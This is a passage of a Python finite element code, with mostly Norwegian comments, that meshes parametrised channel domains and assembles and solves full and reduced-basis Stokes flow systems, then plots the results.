zip(rlist,Nlist):\n thetalist = np.linspace(0,np.pi,4*num+1)\n for theta in thetalist:\n if num == Nr:\n curvededge.append(count+1)\n if theta == np.pi or theta == 0:\n flatedge.append(count+1)\n px.append(px[0]+np.cos(theta)*rad)\n py.append(py[0] +np.sin(theta)*rad)\n count += 1\n\n px = np.asarray(px)\n py = np.asarray(py)\n p = np.vstack((px,py))\n mesh = spsa.Delaunay(p.T)\n if y1 != np.inf:\n py = (py - y0)*((y1-y0)/r) + y0\n p = np.vstack((px,py))\n sortflatedge = np.concatenate((flatedge[-1::-2],flatedge[1::2]),axis=0)\n\n edgepts = np.concatenate((sortflatedge[:-1],curvededge))\n edge = np.zeros((len(edgepts)-1,2))\n for i in range(len(edgepts)-1):\n edge[i][0] = int(edgepts[i])\n edge[i][1] = int(edgepts[i+1])\n if edgepoints:\n return p.T, mesh.simplices, edge, sortflatedge, curvededge\n else:\n return p.T, mesh.simplices,edge\n\ndef meshMaker(x0, x1, y0, y1, N, M,edgepoints = False):\n Lx = np.linspace(x0,x1,N+1)\n Ly = np.linspace(y0,y1,M+1)\n ax,ay = np.meshgrid(Lx,Ly)\n\n Ax = ax.ravel()\n Ay = ay.ravel()\n\n bp = np.vstack((Ax, Ay)).T\n\n mesh = spsa.Delaunay(bp)\n south = []\n east = []\n west = []\n north = []\n count = 0\n for point in bp:\n if point[1] == y0:\n south.append(count)\n if point[1] == y1:\n north.append(count)\n if point[0] == x0:\n west.append(count)\n if point[0] == x1:\n east.append(count)\n count += 1\n north = np.flip(north)\n west = np.flip(west)\n\n edgepts = np.concatenate((south,east[1:],north[1:],west[1:]),axis = 0)\n edge = np.zeros((len(edgepts)-1,2))\n for i in range(len(edgepts)-1):\n edge[i][0] = int(edgepts[i])\n edge[i][1] = int(edgepts[i+1])\n \n 
if edgepoints:\n return bp, mesh.simplices, edge, south, east, np.flip(north), np.flip(west)\n\n return bp, mesh.simplices, edge\n\ndef nodeReplacer(p1,p2,edge,mesh):\n indexes = np.asarray([i for i in range(len(p2))])\n inverses = indexes[~np.isin(np.arange(indexes.size), edge)]\n replacepoints =p2[edge]\n p2 = p2[inverses]\n tol = 10E-10 \n\n for count,inv in enumerate(inverses):\n mesh = [[count + len(p1) if x == inv else x for x in sub] for sub in mesh]\n\n for count,point in enumerate(p1):\n for replace,index in zip(replacepoints,edge):\n if point[0] - tol < replace[0] < point[0] + tol and point[1] - tol < replace[1] < point[1] + tol:\n mesh = [[count if x == index else x for x in sub] for sub in mesh]\n \n mesh = np.asarray(mesh)\n p2 = np.asarray(p2)\n return p2, mesh\n\ndef domainCreator(halfcircles=1, rectangles=0,resolution=1,circleheight =1, rectangleheight = 1):\n tol = 10E-10\n length = 1/5 + (3*(halfcircles + rectangles))/5\n N = int(length*10*resolution)\n M = int(4*resolution)\n p,mesh,edge,south,east,north,west = meshMaker(0,length,.5,.7,N,M,edgepoints = True)\n position = 0.2\n circleheight *= 0.2\n rectangleheight *= 0.2\n\n while halfcircles != 0:\n newp, newmesh, edge, flat, curve = halfCircleMeshMaker(position,position +.4,.7,y1 = .7 + circleheight, Nr = int(2*resolution),edgepoints = True)\n newp, newmesh = nodeReplacer(p,newp,flat,newmesh)\n p = np.concatenate((p,newp),axis = 0)\n mesh = np.concatenate((mesh,newmesh),axis = 0)\n\n position += .6\n halfcircles -= 1\n\n while rectangles != 0:\n newp, newmesh, edge, south, east, north, west = meshMaker(position,position + .4,.7,.7 + rectangleheight, 4*resolution,2*resolution,edgepoints=True)\n newp, newmesh = nodeReplacer(p,newp,south,newmesh)\n p = np.concatenate((p,newp),axis = 0)\n mesh = np.concatenate((mesh,newmesh),axis = 0)\n\n position += .6\n rectangles -= 1\n\n pfx = p[:,0]\n pfy = p[:,1]\n\n pflip = np.vstack((pfx,1-pfy)).T\n pflip = pflip[np.asarray(south).max()+1:]\n meshflip = [[x + len(pflip) if x > np.asarray(south).max() else x for x in sub] for sub in mesh]\n p = np.concatenate((p,pflip,),axis = 0)\n mesh = np.concatenate((mesh,meshflip),axis = 0)\n\n return p, mesh, edge\n\n\n#returnerer koeffisientene til de bikvadratiske basisfunksjonene\ndef phiSq(points,el):\n phi_el = np.ones((9,9))\n for i,p in enumerate(points[el]):\n phi_el[i] = [1,p[0],p[1],p[0]*p[1],p[0]**2,p[1]**2,(p[0]**2)*p[1],p[0]*(p[1]**2),(p[0]**2)*(p[1]**2)]\n basis_coeffs = np.zeros((9,9))\n\n for a in range(9):\n b = np.zeros(9)\n b[a] = 1\n c = np.linalg.solve(phi_el,b)\n basis_coeffs[a] = c\n return basis_coeffs\n\n#returnerer koeffisientene til de bilineære basisfunksjonene\ndef phiLin(points,el):\n phi_el = np.ones((4,4))\n for i,p in enumerate(points[el]):\n phi_el[i] = [1,p[0],p[1],p[0]*p[1]]\n basis_coeffs = np.zeros((4,4))\n\n #basis_functions: konstantene til hver basisfunksjon for elementet: [[C1,C1x,C1y],[C2,C2x,C2y],[C3,C3x,C3y]] \n for a in range(4):\n b = np.zeros(4)\n b[a] = 1\n c = np.linalg.solve(phi_el,b) \n basis_coeffs[a] = c\n return basis_coeffs\n\n#numerisk integrasjonsfunksjon\nN1 = lambda zeta,eta: .25*(1-zeta)*(1-eta)\nN2 = lambda zeta,eta: .25*(1+zeta)*(1-eta)\nN3 = lambda zeta,eta: .25*(1+zeta)*(1+eta)\nN4 = lambda zeta,eta: .25*(1-zeta)*(1+eta)\nN0 = lambda zeta,eta: [N1(zeta,eta),N2(zeta,eta),N3(zeta,eta),N4(zeta,eta)]\ndx = lambda x: [x[1]-x[0],x[2]-x[3]]\ndy = lambda y: [y[3]-y[0],y[2]-y[1]]\ndeta = lambda eta: [1-eta,1+eta]\ndet = lambda zeta,eta,x,y: 
(1/16)*np.dot(dx(x),deta(eta))*np.dot(dy(y),deta(zeta))- (1/16)*np.dot(dx(y),deta(eta))*np.dot(dy(x),deta(zeta))\nev = lambda zeta,eta,evi: np.dot(evi,N0(zeta,eta))\n\ndef gauss2D(integrand,p,el,i,j,c1 = 0,c2 = 0,multibasis = False,degree = 4):\n p1,p2,p3,p4 = p[el[0]],p[el[1]],p[el[3]],p[el[2]]\n xi = [p1[0],p2[0],p3[0],p4[0]]\n yi = [p1[1],p2[1],p3[1],p4[1]]\n\n integral = 0\n if degree ==3:\n weights = [5/9,8/9,5/9]\n eval_pts = [-np.sqrt(3/5),0,np.sqrt(3/5)]\n if degree == 4:\n w1 = (18-np.sqrt(30))/36\n w2 = (18+np.sqrt(30))/36\n ev1 = np.sqrt((3/7)-(2/7)*np.sqrt(6/5))\n ev2 = np.sqrt((3/7)+(2/7)*np.sqrt(6/5))\n weights = [w1,w2,w2,w1]\n eval_pts = [-ev2,-ev1,ev1,ev2]\n for w1,ev1 in zip(weights,eval_pts):\n for w2,ev2 in zip(weights,eval_pts):\n if multibasis:\n integral += w1*w2*det(ev1,ev2,xi,yi)*integrand(ev(ev1,ev2,xi),ev(ev1,ev2,yi),c1,c2,i,j)\n else:\n integral += w1*w2*det(ev1,ev2,xi,yi)*integrand(ev(ev1,ev2,xi),ev(ev1,ev2,yi),c2,i,j)\n return integral\n\n#maskeringsfunksjon for plotting\ndef apply_mask(triang,p, alpha=0.1,coord_mask = False):\n if coord_mask:\n x = p[triang.triangles,0].mean(axis=1) \n y = p[triang.triangles,1].mean(axis=1)\n cond1 = np.logical_and(x < .4, y > .2)\n cond2 = np.logical_and(x > .6,y >.2)\n #cond2 = np.logical_and(y < .15, y > .05)\n #mask = np.logical_and(cond1,cond2)\n # apply masking\n triang.set_mask(cond2)\n else:\n # Mask triangles with sidelength bigger some alpha\n triangles = triang.triangles\n # Mask off unwanted triangles.\n xtri = p[triangles,0] - np.roll(p[triangles,0], 1, axis=1)\n ytri = p[triangles,1] - np.roll(p[triangles,1], 1, axis=1)\n maxi = np.max(np.sqrt(xtri**2 + ytri**2),axis=1)\n # apply masking\n triang.set_mask(maxi > alpha)\n\n#hjelpefunksjon for generering av stivhets- og divergensmatriser\ndef submat(points,el,int_func,multibasis = False):\n if multibasis:\n c1 = phiLin(points,el[0])\n c2 = phiSq(points,el[1])\n dim1 = len(c1)\n dim2 = len(c2)\n else:\n c2 = phiSq(points,el[1])\n dim1 = len(c2)\n dim2 = dim1\n a_el = np.zeros((dim1,dim2))\n for i in range(dim1):\n for j in range(dim2):\n if multibasis:\n a_el[i,j] += gauss2D(int_func,points,el[0],i,j,c1 = c1,c2 = c2,multibasis =multibasis)\n else:\n a_el[i,j] += gauss2D(int_func,points,el[0],i,j,c2 = c2)\n return a_el\n\n#genererer stivhetsmatrisa\ndef createA(int_func,points,elements):\n A = sp.lil_matrix((len(points),len(points)))\n for el in elements:\n a_el = submat(points,el,int_func)\n for i,ai in enumerate(el[1]):\n for j,aj in enumerate(el[1]):\n A[ai,aj] += a_el[i,j]\n return A\n\n#genererer divergensmatrisa \ndef createD(int_func,points,elements):\n B = sp.lil_matrix((len(points),len(points)))\n for el in elements:\n a_el = submat(points,el,int_func,multibasis=True)\n for i,ai in enumerate(el[0]):\n for j,aj in enumerate(el[1]):\n B[ai,aj] += a_el[i,j]\n return B\n\n#samlefunksjon for å genere Noder, elementer, kanter og indre noder, gitt type domene\ndef createDomain(N,typ = 0):\n x = np.linspace(0,1,int(5*(2**N)+1))\n y = np.linspace(0,1,int(5*(2**N)+1))\n X,Y = np.meshgrid(x,y)\n\n px = X.ravel()\n py = Y.ravel()\n origpts = np.vstack((px,py)).T\n if typ == 0:\n points = origpts[origpts[:,1] <.20005]\n elements,lin_set = typeZeroDom(points,N)\n non_homog_dir,homog_dir,neumann = typeZeroBdry(points,N)\n elif typ == 1:\n points = origpts[np.logical_or(origpts[:,1] <.20005,np.logical_and(np.logical_and(origpts[:,0] > .39995,origpts[:,0] < .60005),origpts[:,1]<.40005))]\n elements,lin_set = typeOneDom(points,N)\n non_homog_dir,homog_dir,neumann = 
typeOneBdry(points,N)\n elif typ == 2:\n points = origpts[np.logical_or(origpts[:,1] <.20005,np.logical_and(np.logical_and(origpts[:,0] > .39995,origpts[:,0] < .60005),origpts[:,1]<.60005))]\n elements,lin_set = typeTwoDom(points,N)\n non_homog_dir,homog_dir,neumann = typeTwoBdry(points,N)\n elif typ == 3:\n points = origpts[np.logical_or(np.logical_and(origpts[:,1] <.20005,origpts[:,0] < .60005),np.logical_and(np.logical_and(origpts[:,0] > .39995,origpts[:,0] < .60005),origpts[:,1]<.60005))]\n elements,lin_set = typeThreeDom(points,N)\n non_homog_dir,homog_dir,neumann = typeThreeBdry(points,N)\n elif typ == 4:\n points = origpts[np.logical_or(np.logical_and(origpts[:,1] <.20005,origpts[:,0] < .60005),np.logical_and(np.logical_and(origpts[:,0] > .39995,origpts[:,0] < .60005),origpts[:,1]<.60005))]\n points = np.vstack((-points[:,1]+.6,points[:,0]-.4)).T\n elements,lin_set = typeThreeDom(points,N)\n neumann,homog_dir,non_homog_dir = typeThreeBdry(points,N)\n elif typ == 5:\n points = origpts[origpts[:,1] <.20005]\n elements,lin_set = typeFiveDom(points,N)\n non_homog_dir,homog_dir,neumann = typeZeroBdry(points,N)\n homog_dir = np.concatenate((np.array(np.where(np.logical_and(np.logical_and(points[:,0]< 0.550005,points[:,0]> 0.449995),np.logical_and(points[:,1]< 0.150005,points[:,1]> 0.049995))))[0],homog_dir))\n elif typ == 6:\n points = origpts[np.logical_or(origpts[:,1] <.20005,np.logical_and(origpts[:,1] <.40005,origpts[:,0] <.60005))]\n elements,lin_set = typeSixDom(points,N)\n non_homog_dir,homog_dir,neumann = typeSixBdry(points,N)\n elif typ == 7:\n points = origpts[np.logical_or(origpts[:,1] <.20005,np.logical_and(origpts[:,1] <.40005,origpts[:,0] <.60005))]\n points[:,0] = 1 - points[:,0]\n elements,lin_set = typeSixDom(points,N)\n neumann,homog_dir,non_homog_dir = typeSixBdry(points,N)\n\n #definerer indre noder\n inner = np.array([i for i in range(len(points))])\n inner = inner[~np.isin(inner, np.concatenate((non_homog_dir,homog_dir)))]\n return points,elements,lin_set,non_homog_dir,homog_dir, neumann,inner\n\n#fjerner ønskede rader og kolonner fra inputmatrisa\ndef matrixShaver(Mat,rows,cols):\n Out = Mat[rows]\n Out = Out[:,cols]\n return Out\n\n#hjelpefunksjon\ndef solHelper(sol,lift,inner,points,non_homog):\n uxinner = sol[:len(inner)]\n uyinner = sol[len(inner):2*len(inner)]\n p = sol[2*len(inner):]\n ux = np.zeros(len(points))\n uy = np.zeros(len(points))\n ux[inner] = uxinner\n ux[non_homog] = lift\n uy[inner] = uyinner\n return ux,uy,p\n\ndef solHelper2(sol_r,RB_mat,points,non_homog,inner,lift):\n RB1 = RB_mat[:len(inner)]\n RB2 = RB_mat[len(inner):2*len(inner)]\n RB3 = RB_mat[2*len(inner):]\n temp = RB_mat.shape[1]\n\n uxr = sol_r[:temp]\n uyr = sol_r[temp:2*temp]\n pr = sol_r[2*temp:]\n uxinner = RB1@uxr\n uyinner = RB2@uyr\n p = RB3@pr\n\n ux = np.zeros(len(points))\n uy = np.zeros(len(points))\n ux[inner] = uxinner\n ux[non_homog] = lift\n uy[inner] = uyinner\n return ux,uy,p\n\n#hjelpefunksjon\ndef plotHelp(points,N,mu_max):\n tri = mtri.Triangulation(points[:,0],points[:,1])\n apply_mask(tri,points,alpha= ((1+mu_max)*0.3)/(2**(N)),coord_mask=True)\n return tri\n\n#plottefunksjoner\ndef contourPlotter(u,tri,title = \"title\",fname = \"filename\",newfig = True,save = True,cbar = True):\n if newfig:\n plt.figure()\n plt.title(title)\n ax1 = plt.tricontourf(tri,u,levels = 50,cmap = 'rainbow')\n #ax2 = plt.tricontour(tri,u,levels = 20,colors = 'black',linewidths=0.25)\n plt.axis('scaled')\n if cbar:\n plt.colorbar(ax1)\n if save:\n plt.savefig(fname, dpi=500, 
facecolor='w', edgecolor='w',orientation='portrait', format=None,transparent=False, bbox_inches=None, pad_inches=0.1, metadata=None)\n\ndef quiverPlotter(ux,uy,points,title = \"title\",fname = \"filename\",newfig = True, save = True):\n if newfig:\n plt.figure()\n plt.title(title)\n ax2 = plt.quiver(points[:,0],points[:,1],ux,uy)\n plt.axis('scaled')\n if save:\n plt.savefig(fname, dpi=500, facecolor='w', edgecolor='w',orientation='portrait', format=None,transparent=False, bbox_inches=None, pad_inches=0.1, metadata=None)\n\ndef initialize(inlet_velocity,N = 4,typ = 0,mu3=0,mu4=0):\n #variabler, mu1 er amplitude på hastighetsprofil, mu2 er dynamsik viskositet\n mu1 = 150\n\n #definerer basisfunksjoner\n phi = lambda x,y,c,i: c[i][0] + c[i][1]*x + c[i][2]*y + c[i][3]*x*y + c[i][4]*(x**2) + c[i][5]*(y**2) + c[i][6]*(x**2)*y + c[i][7]*x*(y**2) +c[i][8]*(x**2)*(y**2)\n phi_dx = lambda x,y,c,i: c[i][1] + c[i][3]*y + 2*c[i][4]*x + 2*c[i][6]*x*y + c[i][7]*(y**2) + 2*c[i][8]*x*(y**2)\n phi_dy = lambda x,y,c,i: c[i][2] + c[i][3]*x + 2*c[i][5]*y + c[i][6]*(x**2) + 2*c[i][7]*x*y+ 2*c[i][8]*(x**2)*y\n\n zeta = lambda x,y,c,i: c[i][0] + c[i][1]*x + c[i][2]*y +c[i][3]*x*y\n zeta_dx = lambda x,y,c,i: c[i][1] + c[i][3]*y\n zeta_dy = lambda x,y,c,i: c[i][2] + c[i][3]*x\n\n a_bilin = lambda x,y,c,i,j: (1/mu1)*(phi_dx(x,y,c,j)*phi_dx(x,y,c,i) + phi_dy(x,y,c,j)*phi_dy(x,y,c,i))\n b_bilin_x = lambda x,y,c1,c2,i,j: -phi_dx(x,y,c2,j)*zeta(x,y,c1,i)\n b_bilin_y = lambda x,y,c1,c2,i,j: -phi_dy(x,y,c2,j)*zeta(x,y,c1,i)\n\n #type domene: 0, 1, 2, 3, 4, 5\n points,elements,lin_set,non_homog,homog,neu,inner = createDomain(N,typ)\n o1 = [0,.4]\n o2 = [.4,.6]\n o3 = [.6,1]\n\n cond1 = np.logical_and(points[:,0] >= o1[0],points[:,0] < o1[1])\n cond2 = np.logical_and(points[:,0] >= o2[0],points[:,0] < o2[1])\n cond3 = np.logical_and(points[:,0] >= o3[0],points[:,0] <= o3[1])\n\n points[cond1,1] = mu3*(points[cond1,1]-.1) + points[cond1,1]\n points[cond2,1] = mu3*5*(o2[1]-points[cond2,0])*(points[cond2,1]-.1) + mu4*5*(points[cond2,0]-o2[0])*(points[cond2,1]-.1) + points[cond2,1]\n points[cond3,1] = mu4*(points[cond3,1]-.1) + points[cond3,1]\n\n #bygger stivhets- og divergensmatrisene\n A = createA(a_bilin,points,elements)\n Dx = createD(b_bilin_x,points,elements)\n Dy = createD(b_bilin_y,points,elements)\n\n #definerer lifting-funksjonen\n rg = inlet_velocity\n\n #fjerner nødvendige rader og kollonner\n Ai = matrixShaver(A,inner,inner)\n Dxi = matrixShaver(Dx,lin_set,inner)\n Dyi = matrixShaver(Dy,lin_set,inner)\n Gx = matrixShaver(Dx,lin_set,non_homog)\n G = matrixShaver(A,inner,non_homog)\n\n #lager høyresiden\n fx = -G@rg\n fy = np.zeros_like(fx)\n fp = -Gx@rg\n rhs = np.concatenate((fx,fy,fp))\n\n #bygger blokkmatrisa og løser\n Block = sp.bmat([[Ai,None,Dxi.T],[None,Ai,Dyi.T],[Dxi,Dyi,None]]).tocsr()\n u_bar = solver(Block,rhs)\n ux,uy,p = solHelper(u_bar,rg,inner,points,non_homog)\n\n print(\"total out volumeflow\")\n if typ == 2:\n print(sum(np.sqrt(ux[neu]**2 + uy[neu]**2))/len(neu)*.4)\n else:\n print(sum(np.sqrt(ux[neu]**2+uy[neu]**2))/len(neu)*(.2+.2*mu4))\n print(\"total in volumeflow\")\n print(sum(np.sqrt(ux[non_homog]**2 + uy[non_homog]**2))/len(non_homog)*(.2+.2*mu3))\n\n #generer triangulering og maskerer for enklere plotting \n return ux,uy,p, points,elements,lin_set,neu\n\ndef get_velocity_type(N,typ,mu3):\n points,elements,lin_set,non_homog,homog,neu,inner = createDomain(N,typ)\n return points[non_homog][:,1] + mu3*(points[non_homog][:,1]-.1)\n\ndef omega(p):\n x = p[0]\n y = p[1]\n if x <= .45 and y <= 
.05:\n return 0\n elif y < .05 and x > .45 and x < .55:\n return 1\n elif y <= .05 and x >= .55:\n return 2\n elif x < .45 and y > .05 and y < .15:\n return 3\n elif x > .55 and y > .05 and y < .15:\n return 4\n elif x <= .45 and y >= .15:\n return 5\n elif y > .15 and x > .45 and x < .55:\n return 6\n elif y >= .15 and x >= .55:\n return 7\n else:\n return -1\n\n#genererer stivhetsmatrisa\ndef createSubA(int_func,points,elements,domain):\n A = sp.lil_matrix((len(points),len(points)))\n for el in elements:\n if omega(points[el[1][4]]) == domain:\n a_el = submat(points,el,int_func)\n for i,ai in enumerate(el[1]):\n for j,aj in enumerate(el[1]):\n A[ai,aj] += a_el[i,j]\n elif omega(points[el[1][4]]) == -1:\n print(\"invalid point!\")\n return A\n return A\n\ndef createSubD(int_func,points,elements,domain):\n B = sp.lil_matrix((len(points),len(points)))\n for el in elements:\n if omega(points[el[1][4]]) == domain:\n a_el = submat(points,el,int_func,multibasis=True)\n for i,ai in enumerate(el[0]):\n for j,aj in enumerate(el[1]):\n B[ai,aj] += a_el[i,j]\n elif omega(points[el[1][4]]) == -1:\n print(\"invalid point!\")\n return B\n return B\n\ndef sparseSolver(Ax_set,Ay_set,Dx_set,Dy_set,Ax_rhs_set,Ay_rhs_set,Dx_rhs_set,q1,q2,q3,q4,mu,points,lin_set,non_homog,inner):\n A = sp.lil_matrix((len(inner),len(inner)))\n A_rhs = sp.lil_matrix((len(inner),len(non_homog)))\n for Ax,Ay,Ax_rhs,Ay_rhs,qx,qy in zip(Ax_set,Ay_set,Ax_rhs_set,Ay_rhs_set,q1,q2):\n A += qx*Ax\n A += qy*Ay\n A_rhs += qx*Ax_rhs\n A_rhs += qy*Ay_rhs\n\n Dx = sp.lil_matrix((len(lin_set),len(inner)))\n Dy = sp.lil_matrix((len(lin_set),len(inner)))\n D_rhs = sp.lil_matrix((len(lin_set),len(non_homog)))\n for D_x,D_y,Dx_rhs,qx,qy in zip(Dx_set,Dy_set,Dx_rhs_set,q3,q4):\n Dx += qx*D_x\n Dy += qy*D_y\n D_rhs += qx*Dx_rhs\n \n y_n = points[non_homog,1]\n\n c = -mu[3]/((1+mu[2])**2)\n rg = y_n*0\n for i,y in enumerate(y_n):\n if omega([0,y]) == 0:\n rg[i] = (20*mu[2]*y + 10*y)*(20*mu[2]*y + 10*y -2 -2*mu[2])\n if omega([0,y]) == 3:\n rg[i] = (10*y + mu[2])*(10*y -2 -mu[2])\n if omega([0,y]) == 5:\n rg[i] = (20*mu[2]*y + 10*y - 2*mu[2])*(20*mu[2]*y + 10*y -2 -4*mu[2])\n\n rg = c*rg\n\n #lager høyresiden\n fx = -A_rhs@rg\n fy = np.zeros_like(fx)\n fp = -D_rhs@rg\n rhs = np.concatenate((fx,fy,fp))\n\n #bygger blokkmatrisa og løser\n Block = sp.bmat([[A,None,Dx.T],[None,A,Dy.T],[Dx,Dy,None]]).tocsr()\n u_bar = solver(Block,rhs)\n return u_bar\n\ndef reducedSolver(Ax_r1,Ax_r2,Ay_r1,Ay_r2,Dx_r,Dy_r,DxT_r,DyT_r,Ax_rhs_r,Ay_rhs_r,Dx_rhs_r,q1,q2,q3,q4,mu,points,non_homog):\n A1 = sp.lil_matrix(Ax_r1[0].shape)\n A2 = sp.lil_matrix(Ax_r2[0].shape)\n A_rhs = sp.lil_matrix(Ax_rhs_r[0].shape)\n for Ax1,Ax2,Ay1,Ay2,Ax_rhs,Ay_rhs,qx,qy in zip(Ax_r1,Ax_r2,Ay_r1,Ay_r2,Ax_rhs_r,Ay_rhs_r,q1,q2):\n A1 += qx*Ax1\n A1 += qy*Ay1\n A2 += qx*Ax2\n A2 += qy*Ay2\n A_rhs += qx*Ax_rhs\n A_rhs += qy*Ay_rhs\n\n Dx = sp.lil_matrix(Dx_r[0].shape)\n Dy = sp.lil_matrix(Dy_r[0].shape)\n DxT = sp.lil_matrix(DxT_r[0].shape)\n DyT = sp.lil_matrix(DyT_r[0].shape)\n D_rhs = sp.lil_matrix(Dx_rhs_r[0].shape)\n for D_x,D_y,D_xT,D_yT,Dx_rhs,qx,qy in zip(Dx_r,Dy_r,DxT_r,DyT_r,Dx_rhs_r,q3,q4):\n Dx += qx*D_x\n Dy += qy*D_y\n DxT += qx*D_xT\n DyT += qy*D_yT\n D_rhs += qx*Dx_rhs\n \n y_n = points[non_homog,1]\n\n c = -mu[3]/((1+mu[2])**2)\n rg = y_n*0\n for i,y in enumerate(y_n):\n if omega([0,y]) == 0:\n rg[i] = (20*mu[2]*y + 10*y)*(20*mu[2]*y + 10*y -2 -2*mu[2])\n if omega([0,y]) == 3:\n rg[i] = (10*y + mu[2])*(10*y -2 -mu[2])\n if omega([0,y]) == 5:\n rg[i] = (20*mu[2]*y + 10*y - 
2*mu[2])*(20*mu[2]*y + 10*y -2 -4*mu[2])\n\n    rg = c*rg\n\n    #assemble the right-hand side\n    fx = -A_rhs@rg\n    fy = np.zeros_like(fx)\n    fp = -D_rhs@rg\n    rhs = np.concatenate((fx,fy,fp))\n\n    #assemble the block matrix and solve\n    Block = sp.bmat([[A,None,Dx.T],[None,A,Dy.T],[Dx,Dy,None]]).tocsr()\n    u_bar = solver(Block,rhs)\n    return u_bar\n\ndef reducedSolver(Ax_r1,Ax_r2,Ay_r1,Ay_r2,Dx_r,Dy_r,DxT_r,DyT_r,Ax_rhs_r,Ay_rhs_r,Dx_rhs_r,q1,q2,q3,q4,mu,points,non_homog):\n    A1 = sp.lil_matrix(Ax_r1[0].shape)\n    A2 = sp.lil_matrix(Ax_r2[0].shape)\n    A_rhs = sp.lil_matrix(Ax_rhs_r[0].shape)\n    for Ax1,Ax2,Ay1,Ay2,Ax_rhs,Ay_rhs,qx,qy in zip(Ax_r1,Ax_r2,Ay_r1,Ay_r2,Ax_rhs_r,Ay_rhs_r,q1,q2):\n        A1 += qx*Ax1\n        A1 += qy*Ay1\n        A2 += qx*Ax2\n        A2 += qy*Ay2\n        A_rhs += qx*Ax_rhs\n        A_rhs += qy*Ay_rhs\n\n    Dx = sp.lil_matrix(Dx_r[0].shape)\n    Dy = sp.lil_matrix(Dy_r[0].shape)\n    DxT = sp.lil_matrix(DxT_r[0].shape)\n    DyT = sp.lil_matrix(DyT_r[0].shape)\n    D_rhs = sp.lil_matrix(Dx_rhs_r[0].shape)\n    for D_x,D_y,D_xT,D_yT,Dx_rhs,qx,qy in zip(Dx_r,Dy_r,DxT_r,DyT_r,Dx_rhs_r,q3,q4):\n        Dx += qx*D_x\n        Dy += qy*D_y\n        DxT += qx*D_xT\n        DyT += qy*D_yT\n        D_rhs += qx*Dx_rhs\n    \n    y_n = points[non_homog,1]\n\n    c = -mu[3]/((1+mu[2])**2)\n    rg = y_n*0\n    for i,y in enumerate(y_n):\n        if omega([0,y]) == 0:\n            rg[i] = (20*mu[2]*y + 10*y)*(20*mu[2]*y + 10*y -2 -2*mu[2])\n        if omega([0,y]) == 3:\n            rg[i] = (10*y + mu[2])*(10*y -2 -mu[2])\n        if omega([0,y]) == 5:\n            rg[i] = (20*mu[2]*y + 10*y - 2*mu[2])*(20*mu[2]*y + 10*y -2 -4*mu[2])\n\n    rg = c*rg\n\n    #assemble the right-hand side\n    fx = -A_rhs@rg\n    fy = np.zeros_like(fx)\n    fp = -D_rhs@rg\n    rhs = np.concatenate((fx,fy,fp))\n\n    #assemble the block matrix and solve\n    Block = sp.bmat([[A1,None,DxT],[None,A2,DyT],[Dx,Dy,None]]).tocsr()\n    u_bar = solver(Block,rhs)\n    return u_bar\n\n\n#x_e = [0,-1,2,-2,3,0,1,1]\n\n#Nmat = N(1,1)\n\n#dx = lambda x: [x[1]-x[0],x[2]-x[3]]\n#dy = lambda y: [y[3]-y[0],y[2]-y[1]]\n\n#x = [0,2,2,0]\n#y = [0,-2,0,2]\n\n#m = [3,4,5]\n\n#print(max(m))\n\n\n\n'''\nstarttime = time.time()\np, mesh, edge = domainCreator(2, 2,2,.5,.8)\nprint(\"Nodes:\",len(p))\nprint(\"time:\",time.time()-starttime)\n\nplt.figure(1)\nplotElements(p,mesh)\nplt.axis('scaled')\nplt.savefig(\"testmesh\", dpi=500, facecolor='w', edgecolor='w',orientation='portrait', format=None,transparent=False, bbox_inches=None, pad_inches=0.1, metadata=None)\n\n#plt.figure(2)\n#plotPoints(p)\n#plt.savefig(\"testpoints\", dpi=500, facecolor='w', edgecolor='w',orientation='portrait', format=None,transparent=False, bbox_inches=None, pad_inches=0.1, metadata=None)\n\nplt.close(\"all\")\n\n\nmu3 = 1\nmu5 = 2\n\nJ1 = np.asmatrix([[mu3+1,0],[0,2*mu5 +1]])\n\npoints = [3,3,3]\nA = [sp.lil_matrix((len(points),len(points))) for i in range(5)]\nA[0][0,0] = 1\nprint(A[0].todense())\nomega_list = [[0,1],[2,3],[4,5],[6,7],[8,9],[10,11],[12,13],[14,15]]\nprint(len(omega_list))\n\ndef sparsesolver3(bilin,lin,N,dirichlet,qs):\n\n    bilin_sum = sp.lil_matrix((N,N))\n    for i in range(len(qs)):\n        bilin_sum += bilin[i]*qs[i]\n\n    #remove Dirichlet nodes\n    bilin_sum[dirichlet,:] = 0\n    bilin_sum[dirichlet,dirichlet] = 1\n    lin[dirichlet] = 0\n    #solve\n    sparse_A = sp.csr_matrix(bilin_sum)\n    sparse_sol = solver(sparse_A,lin)\n    solution = np.asarray(sparse_sol)\n    #insert the solution of the linear system in the right place, i.e. 
set the Dirichlet nodes to value 0.\n    solution[dirichlet] = 0\n    return solution\n\n\n\n\ndef typeSixBdry(points,N):\n    non_homo_dir1 = [i*(5*(2**N)+1) for i in range(1,(2**N)+1)] \n    non_homo_dir2 = [i*(3*(2**N)+1)+((2**N)+1)*(5*(2**N)+1) for i in range((2**N)-1)]\n    non_homo_dir = np.concatenate((non_homo_dir1,non_homo_dir2)) \n    homo_dir1 = [i for i in range(5*(2**N)+1)]\n    homo_dir2 = [i for i in range(((2**N)-1)*(3*(2**N)+1)+((2**N)+1)*(5*(2**N)+1),len(points))]\n    homo_dir3 = [i for i in range((2**N)*(5*(2**N)+1)+3*(2**N),(2**N)*(5*(2**N)+1)+5*(2**N)+1)]\n    homo_dir4 = [i*(3*(2**N)+1)+((2**N)+1)*(5*(2**N)+1)-1 for i in range(1,(2**N))]\n    homo_dir = np.concatenate((homo_dir1,homo_dir2,homo_dir3,homo_dir4))\n    homo_neu = [i*(5*(2**N)+1)-1 for i in range(2,2**N+1)]\n    return np.asarray(non_homo_dir), np.asarray(np.sort(homo_dir)), np.asarray(homo_neu)\n\ndef typeSixDom(points,N):\n    i = 0\n    r = 1\n    elements = []\n    lin = []\n    sq = []\n    lin_vec = []\n    while r != (2**N)+1:\n        lin = np.asarray([i,i+2,i+(10*(2**N)+2),i+(10*(2**N)+4)])\n        sq = np.asarray([i,i+1,i+2,i+(5*(2**N)+1),i+(5*(2**N)+2),i+(5*(2**N)+3),i+(10*(2**N)+2),i+(10*(2**N)+3),i+(10*(2**N)+4)])\n        el = [lin,sq]\n        elements.append(el)\n        lin_vec = np.concatenate((lin_vec,lin))\n        i += 2\n        if i==(5*(2**N))*r + r -1:\n            i += 5*(2**N) +2\n            r += 2\n    \n    r = 1\n    ti = i\n    while r != (2**N) +1:\n        if r == 1:\n            lin = np.asarray([i,i+2,i+4*2*(2**N)+2,i+4*2*(2**N)+4])\n            sq = np.asarray([i, 